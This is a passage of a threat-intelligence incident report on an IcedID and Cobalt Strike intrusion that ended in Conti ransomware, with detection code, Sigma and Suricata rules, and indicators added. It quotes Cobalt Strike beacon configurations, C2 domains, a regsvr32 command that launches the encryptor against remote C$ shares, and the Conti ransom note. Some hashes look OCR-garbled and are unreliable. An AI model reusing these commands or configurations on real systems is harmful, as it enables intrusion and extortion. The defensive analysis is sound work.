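Three of the Sysmon signals in this report (Event ID 8 remote threads into winlogon/explorer, Event ID 18 MSSE-xxxx-server pipes, and the Event ID 22 SAMTHEADMIN-xx NXDOMAIN lookups from the privilege escalation section) share the same "Key: value" message layout, so one small parser can drive all three rules. The following is an added example (not code from the report or from Sysmon's tooling); the events are constructed to mirror the ones quoted here, with made-up host name, and the target-process list is the author's:

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon messages modelled on the Event ID 8, 18 and 22 records quoted in
# this report; the DC host name and the benign control events are made up.
SAMPLE_EVENTS = [
    (8, "CreateRemoteThread detected:\n"
        "RuleName: technique_id=T1055,technique_name=Process Injection\n"
        "SourceImage: C:\\Windows\\System32\\regsvr32.exe\n"
        "TargetImage: C:\\Windows\\System32\\winlogon.exe\n"
        "StartAddress: 0x000002029E1B0008\n"
        "StartModule: -\n"
        "StartFunction: -"),
    (18, "Pipe Connected:\n"
         "EventType: ConnectPipe\n"
         "PipeName: \\MSSE-3328-server\n"
         "Image: \\\\DC01\\ADMIN$\\61582ab.exe"),
    (22, "Dns query:\n"
         "QueryName: SAMTHEADMIN-92\n"
         "QueryStatus: 9003\n"
         "Image: C:\\Windows\\system32\\dllhost.exe"),
    (18, "Pipe Connected:\n"                      # benign: PowerShell remoting host pipe
         "EventType: ConnectPipe\n"
         "PipeName: \\PSHost.132836.1234.DefaultAppDomain.powershell\n"
         "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"),
    (22, "Dns query:\n"                           # benign: ordinary NXDOMAIN
         "QueryName: wpad\n"
         "QueryStatus: 9003\n"
         "Image: C:\\Windows\\System32\\svchost.exe"),
]

INJECTION_TARGETS = {"winlogon.exe", "explorer.exe", "lsass.exe", "svchost.exe", "dllhost.exe"}
COBALT_STRIKE_PIPE = re.compile(r"^\\MSSE-\d{4}-server$", re.I)  # default Artifact Kit pipe
SAMTHEADMIN_QUERY = re.compile(r"^SAMTHEADMIN-\d+$", re.I)       # sam-the-admin default name


def parse_fields(message):
    """Turn a Sysmon 'Key: value' message body into a dict; the first line is the title."""
    fields = {}
    for line in message.splitlines()[1:]:
        key, sep, value = line.partition(":")  # split on the first colon only (paths contain ':')
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def triage_event(event_id, message):
    """Return a finding string for one event, or None when nothing in it matches."""
    f = parse_fields(message)
    if event_id == 8:
        target = PureWindowsPath(f.get("TargetImage", "")).name.lower()
        if target in INJECTION_TARGETS and f.get("StartModule") == "-":
            return (f"T1055: remote thread into {target} from {f.get('SourceImage')} "
                    "at an address backed by no module")
    elif event_id == 18:
        pipe, image = f.get("PipeName", ""), f.get("Image", "")
        if COBALT_STRIKE_PIPE.match(pipe):
            via_admin_share = "\\ADMIN$\\" in image.upper()
            return (f"Cobalt Strike Artifact Kit pipe {pipe} from {image}"
                    + (" (executed from ADMIN$)" if via_admin_share else ""))
    elif event_id == 22:
        if SAMTHEADMIN_QUERY.match(f.get("QueryName", "")) and f.get("QueryStatus") == "9003":
            return (f"CVE-2021-42278/42287 attempt: {f.get('Image')} looked up "
                    f"{f.get('QueryName')} (NXDOMAIN)")
    return None


def triage(events):
    """Run triage_event over (event_id, message) pairs and keep the hits."""
    findings = []
    for event_id, message in events:
        finding = triage_event(event_id, message)
        if finding:
            findings.append((event_id, finding))
    return findings


if __name__ == "__main__":
    for event_id, finding in triage(SAMPLE_EVENTS):
        print(event_id, finding)
```

The StartModule check on Event ID 8 is what separates beacon injection (thread starting in unbacked memory) from the many legitimate CreateRemoteThread callers whose start address resolves to a loaded DLL; the pipe rule is cheap but only catches operators who kept the Artifact Kit defaults.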
LogName=Microsoft-Windows-Sysmon/Operational 
EventCode=18 
EventType=4 
ComputerName=[REDACTED DC Name] 
User=NOT_TRANSLATED 
Sid=S-1-5-18 
SidType=0 
SourceName=Microsoft-Windows-Sysmon 
Type=Information 
RecordNumber=1717578 
Keywords=None 
TaskCategory=Pipe Connected (rule: PipeEvent) 
OpCode=Info 
Message=Pipe Connected: 
RuleName: technique_id=T1021.002,technique_name=SMB/Windows Admin Shares 
EventType: ConnectPipe 
UtcTime: [REDACTED] 
ProcessGuid: {f2bd618e-3a87-61ca-1808-020000000600} 
ProcessId: 9088 
PipeName: \MSSE-3328-server 
Image: \\[REDACTED]\ADMIN$\61582ab.exe 


LogName=Microsoft-Windows-Sysmon/Operational 
EventCode=18 
EventType=4 
ComputerName=[REDACTED DC Name] 
User=NOT_TRANSLATED 
Sid=S-1-5-18 
SidType=0 
SourceName=Microsoft-Windows-Sysmon 
Type=Information 
RecordNumber=647444 
Keywords=None 
TaskCategory=Pipe Connected (rule: PipeEvent) 
OpCode=Info 
Message=Pipe Connected: 
RuleName: technique_id=T1021.002,technique_name=SMB/Windows Admin Shares 
EventType: ConnectPipe 
UtcTime: [REDACTED] 22:13:17.006 
ProcessGuid: {47d5446d-3a7b-61ca-f933-000000000500} 
ProcessId: 7492 
PipeName: \MSSE-7344-server 
Image: \\[REDACTED]\ADMIN$\044b7e1.exe 


Command and Control 


We observed the IcedID DLL dropping multiple CS beacons on the beachhead: 


ljucko32.dll 
Ewge.dll 
Edebef4.dll 


[Figure: IcedID DLL -> "Dropped multiple Cobalt Strike beacons" -> the three DLLs above and Faicuy4.exe] 


Action Type | Initiating Process File Name | Initiating Process Folder Path | Initiating Process Parent File Name | File Name 
LolbinsDownloadedFileFromInternet | regsvr32.exe | C:\Windows\System32 | cmd.exe | Edebef4.dll 
LolbinsDownloadedFileFromInternet | regsvr32.exe | C:\Windows\System32 | cmd.exe | Ewge.dll 
LolbinsDownloadedFileFromInternet | regsvr32.exe | C:\Windows\System32 | cmd.exe | ljucko32.dll 
LolbinsDownloadedFileFromInternet | regsvr32.exe | C:\Windows\System32 | cmd.exe | Faicuy4.exe 


In each row the initiating process command line is regsvr32.exe loading the hash-named IcedID 
DLL from C:\Users\<REDACTED>\AppData\Local\Temp (the SHA256 file name is not legible). 


Splashtop Streamer 


Threat actors used Splashtop Streamer via Atera agent, allowing them to remotely connect to 
machines without using RDP tunneling or other techniques previously seen in our cases. 


By default, the Splashtop Streamer is automatically installed together with the AteraAgent. 


Computer Name | Initiating Process Command Line | Remote URL
Beachhead | "AgentPackageSTRemote.exe" 96550093-7d53-4a54-9644-38a6b2fe6f10 "3cff8f1c-e549-4clf-aabc-343b457afaca" agent-api.atera.com/Production 443 or8ixLi90Mf "downloadifneeded" | my.splashtop.com
Beachhead | (same command line) | download.splashtop.com
Domain Controller | "AgentPackageSTRemote.exe" 48e674a2-3563-48a1-a224-8ce2e9aada26 "2e346c4a-b87a-443b-b4d8-d899ea8688c3" agent-api.atera.com/Production 443 or8ixLi90Mf "downloadifneeded" | my.splashtop.com
Domain Controller | (same command line) | download.splashtop.com


Computer Name | Initiating Process File Name | Process Command Line
Beachhead | AgentPackageSTRemote.exe | "SRUtility.exe" -a "st-streamer://com.splashtop.streamer/?rmm_code=hZCDFPhK75mJ"
Beachhead | | "SRUtility.exe" -a "st-streamer://com.splashtop.streamer/?rmm_session_pwd=f8154387506a04e293954372a28e366b"
Beachhead | | "SplashtopStreamer3360.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
Domain Controller | AgentPackageSTRemote.exe | "SRUtility.exe" -a "st-streamer://com.splashtop.streamer/?rmm_code=hZCDFPhK75mJ"
Domain Controller | | "SRUtility.exe" -a "st-streamer://com.splashtop.streamer/?rmm_session_pwd=4eaecid030f49d48001e131a10f801c1"
Domain Controller | | "SplashtopStreamer3360.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1

(Blank cells were cut off in the capture.)


Splashtop Streamer usage leaves many network connections to *.api.splashtop.com and 
*.relay.splashtop.com on port 443; the capture showed dozens of distinct relay hosts.


Cobalt Strike 


We observed a default Cobalt Strike malleable C2 profile, the public jQuery-themed profile 
(jQuery file names in the URIs). This activity can be detected with relative ease by the 
Emerging Threats (ET) rules.


Destination | Port | Method | Host | URI
179.43.176.93 | 80 | POST | shytur.com | /jquery-3.3.2.min.js?__cfduid=KZeFÜhilsHccp7dxHac
179.43.176.93 | 80 | POST | shytur.com | /jquery-3.3.2.min.js?__cfduid=26Escb5dtYbNV7WHylY
179.43.176.93 | 80 | GET | shytur.com | /jquery-3.3.1.min.js
179.43.176.93 | 80 | POST | shytur.com | /jquery-3.3.2.min.js?__cfduid=9-5P87Jg0.CyoOGww
179.43.176.93 | 80 | POST | shytur.com | /jquery-3.3.2.min.js?__cfduid=Cvw60T7JAnY9zw5wPA
179.43.176.93 | 80 | GET | shytur.com | /jquery-3.3.1.min.js


There appeared to be no jitter configured, resulting in a constant stream of HTTP requests, 
and if using ET rules, constant alerts would be generated. 


Just based on the ET Cobalt Strike rule, ‘ET MALWARE Cobalt Strike Malleable C2 JQuery 
Custom Profile Response’, there were in excess of 6K alerts generated. 
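As an added example (not code from the report), a small Python detection over constructed log lines modelled on the requests above: it flags the jQuery-profile URIs when they are POSTed or served from a Host that is not a jQuery CDN, and measures request spacing per Host, since the Polling 5000 / Jitter 10 settings in the recovered configs give near-constant five-second gaps. The CDN allowlist, the log format and the __cfduid tokens are assumptions I constructed.

```python
import re
import statistics
from datetime import datetime

# Constructed HTTP log lines (timestamp, destination, method, Host header, URI)
# modelled on the requests seen in this case; not the real capture. The last
# line is a benign jQuery fetch from a CDN, for contrast.
SAMPLE_LOG = """\
2021-12-27T23:40:03.713 179.43.176.93:80 GET shytur.com /jquery-3.3.1.min.js
2021-12-27T23:40:08.720 179.43.176.93:80 POST shytur.com /jquery-3.3.2.min.js?__cfduid=KZeFUhilsHccp7dxHac
2021-12-27T23:40:13.702 179.43.176.93:80 GET shytur.com /jquery-3.3.1.min.js
2021-12-27T23:40:18.731 179.43.176.93:80 POST shytur.com /jquery-3.3.2.min.js?__cfduid=26Escb5dtYbNV7WHylY
2021-12-27T23:40:23.709 179.43.176.93:80 GET shytur.com /jquery-3.3.1.min.js
2021-12-27T23:40:28.715 179.43.176.93:80 GET shytur.com /jquery-3.3.1.min.js
2021-12-27T23:40:31.004 203.0.113.10:443 GET code.jquery.com /jquery-3.3.1.min.js
"""

# URIs of the jQuery malleable C2 profile as recovered from the beacon configs
# in this case: GET /jquery-3.3.1.min.js and POST /jquery-3.3.2.min.js
JQUERY_C2_URI = re.compile(r"^/jquery-3\.3\.[12]\.min\.js(\?__cfduid=.*)?$")

# Assumed allowlist of hosts a genuine jQuery download would come from.
KNOWN_JQUERY_CDNS = {"code.jquery.com", "ajax.googleapis.com", "cdnjs.cloudflare.com"}


def parse_log(text):
    """Split the log into (datetime, dst, method, host, uri) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, dst, method, host, uri = line.split()
        rows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f"), dst, method, host, uri))
    return rows


def find_jquery_c2(text):
    """Requests that fit the profile rather than a CDN fetch: a real jQuery
    download is a GET from a CDN host, while the profile POSTs beacon output to
    a .min.js URI and carries an attacker-controlled Host header."""
    hits = []
    for row in parse_log(text):
        _ts, _dst, method, host, uri = row
        if JQUERY_C2_URI.match(uri) and (method == "POST" or host not in KNOWN_JQUERY_CDNS):
            hits.append(row)
    return hits


def beacon_stats(text, min_requests=3, max_cv=0.2):
    """Per Host header: request count, mean gap between requests and whether the
    spacing is regular enough for a low-jitter beacon. With Polling 5000 ms and
    Jitter 10 the gaps cluster tightly around 5 s, so the coefficient of
    variation (stdev / mean) stays far below max_cv."""
    by_host = {}
    for ts, _dst, _method, host, _uri in parse_log(text):
        by_host.setdefault(host, []).append(ts)
    stats = {}
    for host, times in by_host.items():
        times.sort()
        entry = {"count": len(times), "mean_s": None, "cv": None, "beaconing": False}
        if len(times) >= min_requests:
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            mean = statistics.mean(gaps)
            cv = statistics.stdev(gaps) / mean if mean > 0 else 0.0
            entry.update(mean_s=round(mean, 3), cv=round(cv, 3), beaconing=cv < max_cv)
        stats[host] = entry
    return stats


if __name__ == "__main__":
    for _ts, dst, method, host, uri in find_jquery_c2(SAMPLE_LOG):
        print(f"jquery-c2 pattern: {method} {host}{uri} -> {dst}")
    for host, entry in beacon_stats(SAMPLE_LOG).items():
        print(host, entry)
```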


Due to the length of this intrusion, we observed the threat actors handing off between C2 
servers. We also observed one Cobalt Strike domain change its IP resolution three times over 
the length of the case.
[Screenshot: IDS alert log entries timestamped 2021-12-27T23:40:03.713 through 2021-12-27T23:45:21.187; the alert text is unreadable in the capture]


IcedID:

guguchrome.com
5.181.80.214:80

applesflying.com
5.181.80.113:443
JA3: a0e9f5d64349fb13191bc781f81f42e1
JA3s: ec74a5c51106f0419184d0dd08fb05bc
Certificate: [89:ac:17:b1:f1:b6:9e:c8:bb:e5:f3:59:ac:e4:91:b2:91:f4:85:58]
Not Before: 2021/12/08 20:30:05 UTC
Not After: 2022/12/08 20:30:05 UTC
Issuer Org: Internet Widgits Pty Ltd
Subject Common: localhost
Subject Org: Internet Widgits Pty Ltd
Public Algorithm: rsaEncryption


Cobalt Strike:

bunced.net
103.208.86.7:80
103.208.86.7:443
JA3: Oeecb7bi1551fba4ec03851810d31743f
JA3s: 10b29985cd0ecd878ac083f059c42d51
Certificate: [8f:98:c5:f8:48:96:b6:cd:13:91:7c:4c:32:85:db:b7:e5:e1:bc:8f]
Not Before: 2021/12/09 10:32:43 UTC
Not After: 2022/03/09 10:32:42 UTC
Issuer Org: Let's Encrypt
Subject Common: bunced.net
Public Algorithm: id-ec
PublicKey Curve: secp384r1

{
  "x64": {
    "sha256": "O1a4c5ef0410b379fa83ac1a4132ba6f7b5814192dbdb87e9d7370e6256ea528",
    "md5": "21242d958caf225f76ad71a4d3a6d4d9",
    "config": {
      "Jitter": 10,
      "Spawn To x86": "%windir%\\syswow64\\dllhost.exe",
      "Port": 80,
      "Watermark": 0,
      "C2 Host Header": "",
      "HTTP Method Path 2": "/jquery-3.3.2.min.js",
      "Beacon Type": "0 (HTTP)",
      "C2 Server": "bunced.net,/jquery-3.3.1.min.js",
      "Method 1": "GET",
      "Spawn To x64": "%windir%\\sysnative\\dllhost.exe",
      "Method 2": "POST",
      "Polling": 5000
    },
    "time": 1639100549541.8,
    "sha1": "O4bbdOffa580dd5a85ce4c7fc19c66cc753e45ff",
    "uri_queried": "/uKVG"
  },
  "x86": {
    "sha256": "9cO1afed2a863fa2466679ef53127e925963cc95de98bc4c59cb4743ccc73bf5",
    "md5": "e7dfO3bc59b478f0588039416b845c7f",
    "config": {
      "Jitter": 10,
      "Spawn To x86": "%windir%\\syswow64\\dllhost.exe",
      "Port": 80,
      "Watermark": 0,
      "C2 Host Header": "",
      "HTTP Method Path 2": "/jquery-3.3.2.min.js",
      "Beacon Type": "0 (HTTP)",
      "C2 Server": "bunced.net,/jquery-3.3.1.min.js",
      "Method 1": "GET",
      "Spawn To x64": "%windir%\\sysnative\\dllhost.exe",
      "Method 2": "POST",
      "Polling": 5000
    },
    "time": 1639100538593.3,
    "sha1": "18ddb5fac720599983791036e43154a9ce67ffde",
    "uri_queried": "/Uq4b"
  }
}


shytur.com
179.43.176.93:80
216.73.159.33:80
179.43.176.80:80

{
  "x64": {
    "config": {
      "Port": 80,
      "Beacon Type": "0 (HTTP)",
      "Spawn To x86": "%windir%\\syswow64\\dllhost.exe",
      "Polling": 5000,
      "Method 2": "POST",
      "C2 Server": "shytur.com,/jquery-3.3.1.min.js",
      "C2 Host Header": "",
      "Method 1": "GET",
      "Spawn To x64": "%windir%\\sysnative\\dllhost.exe",
      "Watermark": 0,
      "Jitter": 10,
      "HTTP Method Path 2": "/jquery-3.3.2.min.js"
    },
    "uri_queried": "/RnJS",
    "md5": "22bbd14a893b19220e829940ad474687",
    "sha256": "10084d7146462d06c599bd14664d14c511b40687e21983e6f8bded06982931a9",
    "sha1": "06ef512d5a2b9353b6d0a412a18766e024d3474527",
    "time": 1640639559417.7
  },
  "x86": {
    "config": {
      "Port": 80,
      "Beacon Type": "0 (HTTP)",
      "Spawn To x86": "%windir%\\syswow64\\dllhost.exe",
      "Polling": 5000,
      "Method 2": "POST",
      "C2 Server": "shytur.com,/jquery-3.3.1.min.js",
      "C2 Host Header": "",
      "Method 1": "GET",
      "Spawn To x64": "%windir%\\sysnative\\dllhost.exe",
      "Watermark": 0,
      "Jitter": 10,
      "HTTP Method Path 2": "/jquery-3.3.2.min.js"
    },
    "uri_queried": "/COPz",
    "md5": "a48fbea91a31afaf348f713bif59dfbf",
    "sha256": "d281caef6c8fc45d8725d6cd1542234aea35b97b99bb6aaff7688d91a10716f0",
    "sha1": "7d700ad69d2800de159af5f50bbb82e89467d8b4",
    "time": 1640639554775.3
  }
}


cirite.com
23.81.246.30
JA3: a0e9f5d64349fb13191bc781f81f42e1
JA3s: ae4edc6faf64d08308082ad26be60767
Certificate: [f1:43:f2:43:29:79:35:ad:b5:60:c7:79:3a:0f:c6:68:a3:f2:d5:d1]
Not Before: 2021/10/22 00:00:00 UTC
Not After: 2022/10/22 23:59:59 UTC
Issuer Org: Sectigo Limited
Subject Common: cirite.com [cirite.com, www.cirite.com]
Public Algorithm: rsaEncryption
(The public key and frame header strings below were cut off in the capture.)

{
  "beacontype": ["HTTPS"],
  "sleeptime": 5000,
  "jitter": 20,
  "maxgetsize": 1864736,
  "spawnto": "AAAAAAAAAAAAAAAAAAAAAA==",
  "license_id": 0,
  "cfg_caution": false,
  "kill_date": null,
  "server": {
    "hostname": "cirite.com",
    "port": 443,
    "publickey": "MIGfMAOGCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCNZaG28qpSpw7xhHStBrU-s2eWiOIBlBERsSzWagdIi1TzzJ"
  },
  "host_header": "",
  "useragent_header": null,
  "http-get": {
    "uri": "/posting",
    "verb": "GET",
    "client": {
      "headers": null,
      "metadata": null
    },
    "server": {
      "output": [
        "print",
        "prepend 600 characters",
        "base64",
        "base64url"
      ]
    }
  },
  "http-post": {
    "uri": "/extension",
    "verb": "POST",
    "client": {
      "headers": null,
      "id": null,
      "output": null
    }
  },
  "tcp_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
  "crypto_scheme": 0,
  "proxy": {
    "type": null,
    "username": null,
    "password": null,
    "behavior": "Use IE settings"
  },
  "http_post_chunk": 0,
  "uses_cookies": true,
  "post-ex": {
    "spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
    "spawnto_x64": "%windir%\\sysnative\\rundll32.exe"
  },
  "process-inject": {
    "allocator": "VirtualAllocEx",
    "execute": [
      "CreateThread",
      "CreateRemoteThread",
      "RtlCreateUserThread"
    ],
    "min_alloc": 23886,
    "startrwx": false,
    "stub": "MsiB7fCBDFtfSY7FRZHMbQ==",
    "transform-x86": [
      "prepend '\\x90\\x90\\x90'"
    ],
    "transform-x64": [
      "prepend '\\x90\\x90\\x90'"
    ],
    "userwx": false
  },
  "dns-beacon": {
    "dns_idle": null,
    "dns_sleep": null,
    "maxdns": null,
    "beacon": null,
    "get_A": null,
    "get_AAAA": null,
    "get_TXT": null,
    "put_metadata": null,
    "put_output": null
  },
  "pipename": null,
  "smb_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMA",
  "stage": {
    "cleanup": true
  },
  "ssh": {
    "hostname": null,
    "port": null,
    "username": null,
    "password": null,
    "privatekey": null
  }
}
wayeyoy.com
172.241.29.192:443
Certificate: [00:e7:34:3a:ad:bc:61:59:16:5e:d4:2b:e7:64:fa:8c:d5:42:40:17]
Not Before: 2021/12/07 00:00:00 UTC
Not After: 2022/12/07 23:59:59 UTC
Issuer Org: Sectigo Limited
Subject Common: wayeyoy.com [wayeyoy.com, www.wayeyoy.com]
Public Algorithm: rsaEncryption

A configuration was not obtained for this server.


Exfiltration


We did not observe any exfiltration indicators while analyzing host and network forensic 
artifacts. 


This does not mean that there was no exfiltration, as this could have been performed via 
Cobalt Strike beacons over encrypted channels. 


Impact 


On the 19th day of the intrusion, the threat actors prepared for their final objectives. From 
the beachhead host, the directory listings of the domain controllers were checked again, 
followed by the backup server. On the beachhead host, we observed the threat actors attempt 
to execute the final ransomware payload; the attempt from that host failed, however.


The threat actors then proceeded to look for other elevation paths. After a failed attempt with 
CVE-2021-42278 and CVE-2021-42287, the threat actors executed Cobalt Strike beacons on 
a couple of domain controllers. Once they established this access, around twenty minutes 
later, they again attempted the ransomware deployment and this time the payload executed 
properly and began spreading across the network via SMB. 


The threat actors deployed the ransomware payload as a DLL named x64.dll, which was 
executed using a batch script named backup.bat.
Action Type | Initiating Process Command Line | Process Command Line | File Name
FileCreated | svchost.exe -k UnistackSvcGroup -s CDPUserSvc | | backup.bat
ProcessCreated | svchost.exe -k UnistackSvcGroup -s CDPUserSvc | cmd.exe /C backup.bat |
ProcessCreated | cmd.exe /C backup.bat | conhost.exe 0xffffffff -ForceV1 |
ProcessCreated | cmd.exe /C backup.bat | regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \\[redacted host]\C$" x64.dll | x64.dll

The last row repeats once per target host (17 such rows in the capture); the hostnames are redacted in the source.

This x64.dll DLL contains fingerprints, "conti_v3.dll", seen in our previous cases:

.rdata:00000001800323C0 ; Export Ordinals Table for conti_v3.dll
.rdata:00000001800323C0 ;
.rdata:00000001800323C0 word_1800323C0 dw 1, 0, 2
.rdata:00000001800323C6 aConti_v3_dll db 'conti_v3.dll',0
.rdata:00000001800323D3 aDllinstall db 'DllInstall',0
.rdata:00000001800323DE aDllregisterser db 'DllRegisterServer',0


The linked reference (link lost in extraction) gives an excellent explanation of the command 
line parameters used during the execution of Conti ransomware.


Once the threat actors pushed the encryptor to C$, an excessive amount of SMB network 
activity (~7K) was generated in a short period of time, as indicated by the chart.


This resulted in files being encrypted and a 'readme.txt' ransom note generated on the hosts:

\AppData\Local\Microsoft\OneDrive\setup\logs\readme.txt (1,183 bytes)
\AppData\Local\Microsoft\OneDrive\settings\Personal\readme.txt (1,183 bytes)
\AppData\Local\Microsoft\OneDrive\logs\Personal\readme.txt
\AppData\Local\Microsoft\OneDrive\logs\Common\readme.txt


The ransom note has been slightly modified from our last Conti cases:

All of your files are currently encrypted by CONTI strain.

As you know (if you don't - just "google it"), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly.

If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the data of the lowest value.

To make sure that we REALLY CAN get your data back - we offer you to decrypt 2 random files completely free of charge.

You can contact our team directly for further instructions through our website :

TOR VERSION :
(you should download and install TOR browser first https://torproject.org)

[onion address unreadable in capture; only the fragment cziBa8Qr4 survived]

YOU SHOULD BE AWARE!
Just in case, if you try to ignore us. We've downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible.

---BEGIN ID---
---END ID---


Indicators 


Network 


Email Addresses used for Atera Registration: 
marsmors1947@gmail.com 
hughess6623@outlook.com 


5.181.80.214:80 
guguchrome.com 


5.181.80.113:443 
applesflying.com 


103.208.86.7:80 
bunced.net 


172.241.29.192:443 
wayeyoy.com 


23.81.246.30:443 
cirite.com 


216.73.159.33:80 
shytur.com 


File 
data.dll



Faicuy4.exe 



Ewge.dll/Ijucko32.dll 



Edebef4.dll 



x64.dll 


Detections 


Suricata 


ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response 


ET MALWARE Cobalt Strike Beacon Activity (GET) 


ETPRO POLICY Observed Atera Remote Access Application Activity Domain in TLS SNI 
ET POLICY Command Shell Activity Over SMB - Possible Lateral Movement 


ET POLICY SMB Executable File Transfer 

ET POLICY SMB2 NT Create AndX Request For an Executable File 

ET HUNTING Possible Powershell .ps1 Script Use Over SMB 

ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File 


Sigma 


https://github.com/SigmaHQ/sigma/blob/master/rules/windows/deprecated/sysmon_mimikatz_detection_lsass.yml

https://github.com/SigmaHQ/sigma/blob/11b6b24660c045bb907ed43cfe007349764173bc/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml

https://github.com/SigmaHQ/sigma/blob/071bcc292362fd3754a2da00878bba4bae1a335f/rules/windows/process_creation/proc_creation_win_ad_find_discovery.yml

https://github.com/SigmaHQ/sigma/blob/6b3fc11a48e8aa2773dfe266c3be11e4c4c973a5/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml

https://github.com/SigmaHQ/sigma/blob/eb382c4a59b6d87e186ee269805fe2db2acf250e/rules/windows/builtin/security/win_admin_share_access.yml

https://github.com/SigmaHQ/sigma/blob/04f72b9e78f196544f8f1331b4d9158df34d7ecf/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml

/rules/windows/process_creation/proc_creation_win_trust_discovery.yml

https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fcofco59c/rules/windows/process_creation/proc_creation_win_susp_recon_activity.yml

https://github.com/SigmaHQ/sigma/blob/eo49058d14dd9eco9771b38ed4d59e8b49ba1bad/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml
title: CHCP CodePage Locale Lookup
status: Experimental
description: Detects use of chcp to look up the system locale value as part of host discovery
author: pete go, TheDFIRReport
references:
  - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/
  - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp
date: 2022/02/21
modified: 2022/02/21
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\chcp.com'
    CommandLine|endswith:
      - 'chcp'
    ParentImage|endswith:
      - '\cmd.exe'
    ParentCommandLine|contains:
      - '/c'
  condition: selection
fields:
  - CommandLine
  - ParentCommandLine
falsepositives:
  - Unknown
level: high
tags:
  - attack.discovery
  - attack.t1614.001
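As an added example (not the report's or SigmaHQ's code), a minimal evaluator for the selection logic of the chcp rule above, run over constructed process-creation events; it also carries a second selection I wrote myself for the regsvr32 launch pattern from the Impact section, so the same matcher covers both. The |endswith, |contains and |all modifiers follow Sigma's semantics; the events and the host name FILESRV01 are constructed.

```python
import fnmatch

# Selection of the "CHCP CodePage Locale Lookup" rule above, written as the
# same field|modifier -> values pairs Sigma uses.
CHCP_SELECTION = {
    "Image|endswith": ["\\chcp.com"],
    "CommandLine|endswith": ["chcp"],
    "ParentImage|endswith": ["\\cmd.exe"],
    "ParentCommandLine|contains": ["/c"],
}

# Assumed selection (mine, not from the report) for the launch seen in the
# Impact section: regsvr32 running the DLL via /i: with "-m -net ... -p \\host\C$",
# i.e. the encryptor pointed at a remote admin share.
CONTI_REGSVR32_SELECTION = {
    "Image|endswith": ["\\regsvr32.exe"],
    "CommandLine|contains|all": ["/i:\"-m -net", "-nomutex -p \\\\"],
}


def _value_matches(value, pattern, modifiers):
    """Apply Sigma string modifiers to one (value, pattern) pair.
    Sigma string comparisons are case-insensitive."""
    v, p = (value or "").lower(), pattern.lower()
    if "endswith" in modifiers:
        return v.endswith(p)
    if "startswith" in modifiers:
        return v.startswith(p)
    if "contains" in modifiers:
        return p in v
    return fnmatch.fnmatchcase(v, p)  # no modifier: whole value, * and ? wildcards


def selection_matches(selection, event):
    """A selection map is an AND over its fields. A field's value list is an OR,
    unless the |all modifier is present, in which case every value must match."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        if isinstance(patterns, str):
            patterns = [patterns]
        results = [_value_matches(event.get(field), p, modifiers) for p in patterns]
        if not (all(results) if "all" in modifiers else any(results)):
            return False
    return True


def evaluate(selection, events):
    """Indices of the events the selection fires on (condition: selection)."""
    return [i for i, event in enumerate(events) if selection_matches(selection, event)]


# Constructed process-creation events (FILESRV01 is a placeholder; the report
# redacts the real target hosts).
SAMPLE_EVENTS = [
    {   # 0: chcp launched through cmd /c, as in this intrusion's discovery phase
        "Image": "C:\\Windows\\System32\\chcp.com", "CommandLine": "chcp",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "cmd.exe /c chcp >&2"},
    {   # 1: an admin typing chcp at an interactive prompt (no /c on the parent)
        "Image": "C:\\Windows\\System32\\chcp.com", "CommandLine": "chcp",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\""},
    {   # 2: a build script switching code page; CommandLine does not end in "chcp"
        "Image": "C:\\Windows\\System32\\chcp.com", "CommandLine": "chcp 65001",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "cmd.exe /c build.bat"},
    {   # 3: the Conti launch pattern from backup.bat
        "Image": "C:\\Windows\\System32\\regsvr32.exe",
        "CommandLine": "regsvr32.exe /s /n /i:\"-m -net -size 10 -nomutex -p \\\\FILESRV01\\C$\" x64.dll",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "cmd.exe /C backup.bat"},
    {   # 4: ordinary silent COM registration by an installer
        "Image": "C:\\Windows\\System32\\regsvr32.exe",
        "CommandLine": "regsvr32.exe /s \"C:\\Program Files\\Vendor\\vendor.dll\"",
        "ParentImage": "C:\\Program Files\\Vendor\\setup.exe", "ParentCommandLine": "setup.exe /quiet"},
]

if __name__ == "__main__":
    print("chcp rule fires on events:", evaluate(CHCP_SELECTION, SAMPLE_EVENTS))
    print("regsvr32 rule fires on events:", evaluate(CONTI_REGSVR32_SELECTION, SAMPLE_EVENTS))
```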


YARA

/*
   YARA Rule Set
   Author: The DFIR Report
   Date: 2022-04-04
   Identifier: 9438_conti
   Reference: https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/
*/

